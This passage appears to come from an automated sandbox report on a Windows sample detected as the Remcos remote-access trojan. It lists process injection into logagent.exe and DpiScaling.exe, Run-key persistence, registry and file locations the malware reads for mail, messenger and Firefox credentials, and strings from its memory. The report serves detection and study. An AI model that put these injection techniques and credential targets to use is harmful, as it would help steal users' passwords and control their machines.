              Source: C:\Windows\SysWOW64\logagent.exe, Code function: 7_2_004163AD OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,7_2_004163AD
              Source: C:\Windows\SysWOW64\logagent.exe, Code function: 7_2_0040D211 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,7_2_0040D211
              Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4500:120:WilError_01
              Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5048:120:WilError_01
              Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4612:120:WilError_01
              Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1572:120:WilError_01
              Source: C:\Windows\SysWOW64\DpiScaling.exe, Mutant created: \Sessions\1\BaseNamedObjects\Octopus-GM39UT
              Source: C:\Windows\SysWOW64\logagent.exe, Code function: 19_2_0041208B FindResourceA,SizeofResource,LoadResource,LockResource,19_2_0041208B
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exe, File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\logagent.exe, File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe, File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\DpiScaling.exe, File read: C:\Windows\System32\drivers\etc\hosts
              Source: Window Recorder, Window detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\logagent.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exe, Code function: 0_3_0325802C push eax; ret 0_3_03258068
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exe, Code function: 0_3_031B545C push eax; ret 0_3_031B5498
              Source: C:\Windows\SysWOW64\logagent.exe, Code function: 7_2_004510A8 push eax; ret 7_2_004510C6
              Source: C:\Windows\SysWOW64\logagent.exe, Code function: 7_2_00458445 push esi; ret 7_2_0045844E
              Source: C:\Windows\SysWOW64\logagent.exe, Code function: 7_2_00450786 push ecx; ret 7_2_00450799
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe, Code function: 15_3_0339802C push eax; ret 15_3_03398068
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe, Code function: 15_3_032F545C push eax; ret 15_3_032F5498
              Source: C:\Windows\SysWOW64\logagent.exe, Code function: 19_2_00414060 push eax; ret 19_2_00414074
              Source: C:\Windows\SysWOW64\logagent.exe, Code function: 19_2_00414060 push eax; ret 19_2_0041409C
              Source: C:\Windows\SysWOW64\logagent.exe, Code function: 19_2_00414039 push ecx; ret 19_2_00414049
              Source: C:\Windows\SysWOW64\logagent.exe, Code function: 19_2_004164EB push 0000006Ah; retf 19_2_004165C4
              Source: C:\Windows\SysWOW64\logagent.exe, Code function: 19_2_00416553 push 0000006Ah; retf 19_2_004165C4
              Source: C:\Windows\SysWOW64\logagent.exe, Code function: 19_2_00416555 push 0000006Ah; retf 19_2_004165C4
              Source: C:\Windows\SysWOW64\logagent.exe, Code function: 20_2_00444355 push ecx; ret 20_2_00444365
              Source: C:\Windows\SysWOW64\logagent.exe, Code function: 20_2_004446D0 push eax; ret 20_2_004446E4
              Source: C:\Windows\SysWOW64\logagent.exe, Code function: 20_2_004446D0 push eax; ret 20_2_0044470C
              Source: C:\Windows\SysWOW64\logagent.exe, Code function: 7_2_0040CD09 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,7_2_0040CD09
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exe, File created: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exe, Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Bkmhwql
              Source: C:\Windows\SysWOW64\logagent.exe, Registry key monitored for changes: HKEY_CURRENT_USER_Classes
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exe, Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\logagent.exe, Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exe, Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe, Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\wscript.exe, Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\DpiScaling.exe, Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion:

              Delayed program exit found
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_0040D0B5 Sleep,ExitProcess,7_2_0040D0B5
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\logagent.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,7_2_004160DB
              Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
              Source: C:\Windows\SysWOW64\logagent.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_0040A012 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,7_2_0040A012
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_004061C3 FindFirstFileW,FindNextFileW,7_2_004061C3
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_0040A22D FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,7_2_0040A22D
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_004153F5 FindFirstFileW,FindNextFileW,FindNextFileW,7_2_004153F5
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_00417754 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,7_2_00417754
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_004077EC __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,7_2_004077EC
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 19_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,19_2_00407898
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen,20_2_00407C87
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_0040697D SetEvent,ShellExecuteW,GetLogicalDriveStringsA,StrToIntA,CreateDirectoryW,GetFileAttributesW,DeleteFileW,7_2_0040697D
              Source: DpiScaling.exe, 0000001D.00000002.928991151.0000000003627000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllX
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_0042F727 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_0042F727
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_0040CD09 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,7_2_0040CD09
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_0040F15D GetProcessHeap,OpenProcess,OpenProcess,OpenProcess,GetCurrentProcessId,OpenProcess,GetCurrentProcessId,OpenProcess,7_2_0040F15D
              Source: C:\Windows\SysWOW64\logagent.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeCode function: 0_3_031B7A52 LdrInitializeThunk,0_3_031B7A52
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_0042F8B9 SetUnhandledExceptionFilter,7_2_0042F8B9
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_0042F727 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_0042F727
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_00436793 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00436793

              HIPS / PFW / Operating System Protection Evasion:

              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 2E50000
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 2EE0000
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 2EF0000
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 2F00000
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 2F10000
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 2E60000
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 2E70000
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 2E80000
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 2E90000
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 10590000
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 2EA0000
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 2EB0000
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 2FB0000
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 3240000
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 3250000
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 3260000
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 3270000
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 2FC0000
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 2FD0000
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 2FE0000
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 2FF0000
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 10590000
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 3200000
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 3210000
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 10590000 value starts with: 4D5A
              Source: C:\Windows\SysWOW64\logagent.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 400000 value starts with: 4D5A
              Source: C:\Windows\SysWOW64\logagent.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe Memory written: C:\Windows\SysWOW64\DpiScaling.exe base: 10590000 value starts with: 4D5A
              Contains functionality to inject code into remote processes
              Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_0041412B CreateProcessW,CloseHandle,FindCloseChangeNotification,FindCloseChangeNotification,CloseHandle,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,TerminateProcess,SetThreadContext,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,7_2_0041412B
              Creates a thread in another existing process (thread injection)
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exe Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 2E50000
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exe Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 2F10000
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exe Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 2E90000
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exe Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 2EB0000
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe Thread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 2FB0000
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe Thread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 3270000
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe Thread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 2FF0000
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe Thread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 3210000
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
              Source: C:\Windows\SysWOW64\logagent.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\SysWOW64\logagent.exe /stext 'C:\Users\user\AppData\Local\Temp\igawhodvxqh'
              Source: C:\Windows\SysWOW64\logagent.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\SysWOW64\logagent.exe /stext 'C:\Users\user\AppData\Local\Temp\tifoigoxkyzdtxn'
              Source: C:\Windows\SysWOW64\logagent.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\SysWOW64\logagent.exe /stext 'C:\Users\user\AppData\Local\Temp\vdtziqzqygridlbaiz'
              Source: C:\Windows\SysWOW64\logagent.exe Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\riymadmtmnoxaiwxiygfdnepqidzjygpt.vbs'
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe Process created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe
              Source: logagent.exe, 00000007.00000000.728388363.0000000003760000.00000002.00020000.sdmp, DpiScaling.exe, 0000001D.00000000.899350332.0000000003AB0000.00000002.00020000.sdmpBinary or memory string: Program Manager
              Source: logagent.exe, 00000007.00000000.728388363.0000000003760000.00000002.00020000.sdmp, DpiScaling.exe, 0000001D.00000000.899350332.0000000003AB0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
              Source: logagent.exe, 00000007.00000000.728388363.0000000003760000.00000002.00020000.sdmp, DpiScaling.exe, 0000001D.00000000.899350332.0000000003AB0000.00000002.00020000.sdmpBinary or memory string: Progman
              Source: logagent.exe, 00000007.00000000.728388363.0000000003760000.00000002.00020000.sdmp, DpiScaling.exe, 0000001D.00000000.899350332.0000000003AB0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\logagent.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\logagent.exeCode function: EnumSystemLocalesW,7_2_0044A1D0
              Source: C:\Windows\SysWOW64\logagent.exeCode function: GetLocaleInfoA,7_2_0040D1E5
              Source: C:\Windows\SysWOW64\logagent.exeCode function: EnumSystemLocalesW,7_2_0044A21B
              Source: C:\Windows\SysWOW64\logagent.exeCode function: EnumSystemLocalesW,7_2_0044A2B6
              Source: C:\Windows\SysWOW64\logagent.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,7_2_0044A343
              Source: C:\Windows\SysWOW64\logagent.exeCode function: GetLocaleInfoW,7_2_004423BA
              Source: C:\Windows\SysWOW64\logagent.exeCode function: GetLocaleInfoW,7_2_0044A593
              Source: C:\Windows\SysWOW64\logagent.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,7_2_0044A6BC
              Source: C:\Windows\SysWOW64\logagent.exeCode function: GetLocaleInfoW,7_2_0044A7C3
              Source: C:\Windows\SysWOW64\logagent.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,7_2_0044A890
              Source: C:\Windows\SysWOW64\logagent.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_00404E9A GetLocalTime,CreateEventA,CreateThread,7_2_00404E9A
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 19_2_00406B06 GetVersionExA,19_2_00406B06
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_00416D9E GetComputerNameExW,GetUserNameW,7_2_00416D9E

              Stealing of Sensitive Information:

              Yara detected Remcos RAT
              Source: Yara matchFile source: 29.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.logagent.exe.10590000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.DpiScaling.exe.10590000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.DpiScaling.exe.10591986.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.DpiScaling.exe.10591986.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.DpiScaling.exe.10590000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.logagent.exe.10590000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.logagent.exe.10591986.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.logagent.exe.10591986.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000001D.00000002.926720355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.829624979.0000000003138000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.929301045.0000000010590000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.928991151.0000000003627000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.832488246.0000000010590000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: logagent.exe PID: 3228, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: DpiScaling.exe PID: 5800, type: MEMORYSTR
              Contains functionality to steal Firefox passwords or cookies
              Source: C:\Windows\SysWOW64\logagent.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 7_2_0040A012
              Source: C:\Windows\SysWOW64\logagent.exe Code function: \key3.db 7_2_0040A012
              Tries to steal Mail credentials (via file registry)
              Source: C:\Windows\SysWOW64\logagent.exe Code function: ESMTPPassword 20_2_004033E2
              Source: C:\Windows\SysWOW64\logagent.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 20_2_00402DA5
              Source: C:\Windows\SysWOW64\logagent.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 20_2_00402DA5
              Tries to steal Mail credentials (via file access)
              Source: C:\Windows\SysWOW64\logagent.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
              Source: C:\Windows\SysWOW64\logagent.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
              Source: C:\Windows\SysWOW64\logagent.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Windows\SysWOW64\logagent.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
              Tries to steal Instant Messenger accounts or passwords
              Source: C:\Windows\SysWOW64\logagent.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
              Source: C:\Windows\SysWOW64\logagent.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
              Source: C:\Windows\SysWOW64\logagent.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk
              Source: C:\Windows\SysWOW64\logagent.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
              Source: C:\Windows\SysWOW64\logagent.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt

              Remote Access Functionality:

              Yara detected Remcos RAT
              Source: Yara matchFile source: 29.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.logagent.exe.10590000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.DpiScaling.exe.10590000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.DpiScaling.exe.10591986.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.DpiScaling.exe.10591986.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.DpiScaling.exe.10590000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.logagent.exe.10590000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.logagent.exe.10591986.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.logagent.exe.10591986.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000001D.00000002.926720355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.829624979.0000000003138000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.929301045.0000000010590000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.928991151.0000000003627000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.832488246.0000000010590000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: logagent.exe PID: 3228, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: DpiScaling.exe PID: 5800, type: MEMORYSTR
              Detected Remcos RAT
              Source: logagent.exeString found in binary or memory: Remcos_Mutex_Inj
              Source: logagent.exe, 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmpString found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicense_code.txtSoftware\ExeWDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceUserAccess level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\overridepth_unenc3.2.1 Prov|
              Source: DpiScaling.exe, 0000001D.00000002.926720355.0000000000400000.00000040.00000001.sdmpString found in binary or memory: Remcos_Mutex_Inj
              Source: DpiScaling.exe, 0000001D.00000002.926720355.0000000000400000.00000040.00000001.sdmpString found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicense_code.txtSoftware\ExeWDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceUserAccess level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\overridepth_unenc3.2.1 Prov|
              Source: C:\Windows\SysWOW64\logagent.exeCode function: cmd.exe7_2_004055EA

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsScripting12DLL Side-Loading1DLL Side-Loading1Deobfuscate/Decode Files or Information1Credentials in Registry2System Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsNative API1Application Shimming1Application Shimming1Scripting12Credentials In Files2Account Discovery1Remote Desktop ProtocolEmail Collection1Exfiltration Over BluetoothEncrypted Channel21Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsCommand and Scripting Interpreter1Windows Service1Access Token Manipulation1Obfuscated Files or Information2Security Account ManagerSystem Service Discovery1SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsService Execution2Registry Run Keys / Startup Folder1Windows Service1Software Packing1NTDSFile and Directory Discovery3Distributed Component Object ModelInput CaptureScheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptProcess Injection412DLL Side-Loading1LSA SecretsSystem Information Discovery25SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRegistry Run Keys / Startup Folder1File Deletion1Cached Domain CredentialsQuery Registry1VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol13Jamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading1DCSyncSecurity Software Discovery121Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobModify Registry1Proc FilesystemProcess Discovery3Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
